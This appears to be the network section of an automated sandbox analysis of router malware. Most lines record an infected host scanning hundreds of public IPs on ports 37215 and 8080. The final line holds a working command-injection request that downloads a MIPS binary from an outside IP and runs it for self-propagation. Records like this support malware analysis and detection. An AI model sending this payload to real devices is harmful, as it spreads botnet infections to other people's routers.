          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 144.81.125.86:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 4.159.206.253:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.207.83.212:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 171.225.105.37:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.101.191.1:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.41.84.190:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.45.178.123:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.177.62.24:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.115.211.99:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.125.75.141:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.130.29.117:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.242.228.40:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.101.108.5:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.164.106.206:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.31.151.130:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 121.18.23.18:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 159.80.112.1:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.246.138.24:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.70.247.126:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.252.22.197:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.142.186.237:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.76.250.233:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.133.187.203:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.193.218.82:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.16.85.3:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.238.207.243:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.44.242.245:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.140.183.247:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.216.8.59:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.104.109.206:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.249.139.102:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 202.238.244.199:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.211.25.92:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.120.162.145:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.156.198.191:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.91.232.186:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 161.168.143.209:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.198.90.172:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 87.131.9.1:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.19.229.145:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.96.160.190:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.148.147.138:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.36.251.81:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.54.68.198:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.67.157.46:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.86.129.188:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.230.131.189:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 58.142.5.14:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.200.43.37:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.78.248.92:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.32.25.224:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.27.166.111:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.170.65.128:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.169.158.14:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.195.76.19:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.27.212.239:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.7.85.173:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 120.36.129.217:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.246.193.227:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.122.200.165:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.11.198.189:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 177.126.39.96:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.53.118.224:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.234.34.135:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.184.227.52:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.98.43.159:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 220.74.97.77:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.216.51.96:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.141.170.16:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.176.66.17:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.106.149.80:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.3.149.47:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.233.81.68:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 47.215.97.92:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.215.237.125:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.197.253.207:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.150.204.144:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.171.42.56:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.194.113.88:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.18.190.218:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.187.166.192:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 184.27.133.22:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.155.115.76:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.121.137.158:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.129.122.226:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.247.65.234:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 139.48.20.129:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 135.121.33.118:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.177.63.170:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.60.111.111:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.100.135.89:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.118.248.115:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.228.2.152:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.193.99.177:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.154.8.247:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.237.18.146:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.9.192.29:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 92.53.73.26:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.108.83.47:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 182.66.164.13:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 71.15.103.82:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.120.152.91:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 41.114.119.251:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 32.67.148.94:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 53.96.227.166:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.244.23.228:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.203.254.67:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 98.0.94.85:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.242.233.191:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 85.81.15.49:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.176.71.171:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 27.143.37.255:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 197.130.197.207:37215
          Source: global trafficTCP traffic: 192.168.2.23:30154 -> 157.20.151.116:37215
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 74.175.207.230:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 51.177.181.230:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 148.251.69.224:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 98.124.173.9:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 100.239.42.250:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 72.119.238.182:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 114.220.226.207:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 163.164.9.204:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 134.15.43.133:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 36.151.230.203:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 13.36.16.208:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 194.78.51.17:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 184.252.8.75:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 208.151.186.87:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 80.32.6.224:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 43.164.50.226:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 162.107.53.222:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 72.16.115.162:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 186.230.176.25:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 105.198.46.205:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 25.174.137.65:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 209.114.152.55:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 131.150.179.206:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 50.177.62.170:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 196.191.238.213:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 103.51.172.246:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 191.80.215.6:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 71.128.219.86:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 51.233.160.144:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 53.16.106.18:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 211.162.161.53:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 31.117.116.83:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 167.18.225.116:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 132.67.156.23:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 125.49.37.11:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 106.8.45.245:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 209.50.28.91:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 53.59.151.31:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 116.33.180.164:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 132.28.189.101:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 40.99.209.82:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 123.110.255.152:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 171.167.205.56:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 210.15.45.34:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 136.81.8.228:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 188.196.247.160:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 37.208.251.89:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 131.22.214.163:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 43.214.244.72:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 204.106.86.57:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 72.142.137.246:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 66.144.36.152:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 98.101.231.182:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 124.222.150.116:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 118.64.78.78:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 168.184.30.244:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 18.252.36.11:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 209.230.178.32:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 197.179.204.217:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 80.234.226.193:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 177.94.11.118:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 31.65.176.101:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 137.196.232.31:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 116.242.97.84:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 121.60.95.241:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 191.215.20.31:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 141.8.180.92:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 35.55.244.125:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 2.99.94.164:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 54.227.242.142:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 153.77.76.255:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 13.160.135.112:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 162.79.32.243:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 123.36.172.28:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 116.103.177.143:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 178.18.202.45:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 85.31.240.231:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 68.4.62.78:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 12.0.50.236:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 158.1.144.246:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 169.67.132.122:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 80.115.27.181:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 70.201.7.77:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 213.204.61.71:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 50.101.144.90:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 88.5.249.169:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 57.71.253.199:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 180.66.131.82:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 182.119.59.174:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 111.200.44.141:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 128.75.61.119:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 148.156.177.159:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 41.17.146.110:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 203.229.29.71:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 86.163.119.27:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 80.103.36.155:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 162.54.254.253:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 218.8.176.3:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 210.176.72.11:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 210.157.66.21:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 181.164.124.180:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 132.202.107.195:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 193.85.183.114:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 89.187.171.10:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 66.37.140.203:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 126.81.59.207:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 208.87.213.218:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 146.230.144.231:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 153.188.207.124:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 156.121.248.176:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 128.66.40.29:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 90.106.130.40:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 101.112.88.188:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 80.172.49.190:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 213.128.17.101:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 8.79.157.70:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 25.242.39.181:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 222.22.65.159:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 102.65.247.57:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 108.255.181.83:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 174.245.81.142:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 138.22.13.64:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 96.17.187.204:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 209.17.171.64:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 195.26.106.87:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 39.32.72.60:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 96.255.179.89:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 159.217.175.142:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 73.192.243.17:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 70.50.7.132:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 52.159.180.36:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 167.57.49.4:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 18.26.103.185:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 101.123.39.46:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 186.220.148.138:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 13.246.69.183:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 185.209.224.48:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 116.25.240.125:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 68.127.233.92:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 122.28.75.86:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 57.249.10.159:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 20.8.1.72:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 57.232.31.208:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 151.227.141.67:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 142.220.64.210:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 63.68.214.135:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 89.224.164.84:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 134.112.135.68:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 199.76.164.245:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 204.151.147.84:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 105.254.21.156:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 1.137.134.240:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 75.103.121.254:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 176.109.108.115:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 67.217.218.104:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 62.96.216.233:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 67.117.76.230:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 100.155.99.172:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 78.178.3.162:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 152.213.235.217:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 152.128.55.93:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 140.2.112.43:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 9.188.92.138:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 78.149.61.160:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 219.176.142.148:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 197.27.148.184:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 164.94.62.142:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 76.241.56.28:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 216.149.225.35:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 89.21.108.57:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 41.159.129.116:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 145.84.211.24:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 109.43.74.68:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 189.246.229.209:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 134.42.156.169:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 9.46.65.101:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 77.129.177.234:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 148.243.108.28:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 141.58.60.125:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 58.122.71.82:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 104.162.46.144:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 161.64.249.233:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 47.193.191.231:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 1.43.178.160:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 131.51.122.164:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 170.67.46.197:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 110.247.48.227:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 210.161.28.147:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 38.152.141.2:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 134.160.102.36:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 200.232.200.67:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 128.178.11.140:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 116.46.8.201:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 168.127.141.63:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 191.156.24.193:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 47.54.165.148:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 132.126.207.18:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 189.16.231.113:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 48.61.178.115:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 24.117.18.120:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 13.120.67.24:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 129.193.173.4:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 97.165.228.136:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 106.244.1.23:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 181.182.55.210:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 191.203.139.220:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 82.69.220.121:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 171.238.199.149:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 44.84.184.46:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 171.252.234.86:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 41.132.186.186:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 51.191.185.161:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 82.160.148.136:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 125.30.140.57:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 139.252.103.244:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 64.55.111.102:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 45.231.71.175:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 48.58.69.106:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 81.40.29.232:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 152.82.198.152:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 147.28.225.66:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 140.91.198.133:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 186.102.41.36:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 222.106.226.38:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 132.162.241.128:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 217.241.197.134:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 67.181.10.19:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 113.227.192.12:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 181.214.120.31:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 79.115.187.141:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 131.192.242.135:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 45.4.63.178:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 130.180.202.85:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 211.171.253.248:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 152.243.208.174:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 41.96.179.100:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 43.240.238.194:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 182.20.139.18:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 198.183.179.47:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 101.58.162.230:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 122.89.94.21:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 187.153.131.88:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 190.61.38.56:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 167.136.202.89:8080
          Source: global trafficTCP traffic: 192.168.2.23:28874 -> 182.89.184.238:8080
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
